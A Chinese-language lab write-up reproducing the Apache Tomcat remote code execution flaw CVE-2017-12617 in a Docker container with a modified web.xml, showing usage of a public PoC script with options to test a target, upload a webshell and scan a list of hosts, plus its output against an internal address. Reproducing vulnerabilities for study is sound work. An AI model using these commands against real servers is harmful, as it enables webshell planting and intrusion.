CVE-2017-12617漏洞分析

CVE-2017-12617

Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞,CVE-2017-12617:远程代码执行漏洞。

环境

使用image: tomcat:7.0.79-jre8复现漏洞

docker-compose up -d

修改 .\conf\web.xml 配置文件,增加 readonly 设置为 false ,一定要记得重启下tomcat服务。
为了不用每次都要导入数据,我们将采用挂载的方式持久化,将需要修改的web.xml定义放在./目录,挂载到容器指定目录
volumes:
- ./web.xml:/usr/local/tomcat/conf/web.xml

poc


./cve-2017-12617.py [options]


options:


-u ,–url [::] check target url if it’s vulnerable

-p,–pwn [::] generate webshell and upload it

-l,–list [::] hosts list


[+]usage:


./cve-2017-12617.py -u http://127.0.0.1

./cve-2017-12617.py –url http://127.0.0.1

./cve-2017-12617.py -u http://127.0.0.1 -p pwn

./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn

./cve-2017-12617.py -l hotsts.txt

./cve-2017-12617.py –list hosts.txt

 python tomcat-cve-2017-12617.py -u http://10.160.11.191:8080



   _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
 | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
 | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /  
 | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /   
  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/    



[@intx0x80]


Poc Filename  Poc.jsp
File Created ..
http://10.160.11.191:8080 it's Vulnerable to CVE-2017-12617
http://10.160.11.191:8080/Poc.jsp

参考

*http://www.freebuf.com/vuls/150203.html

你可能感兴趣的:(漏洞复现分析)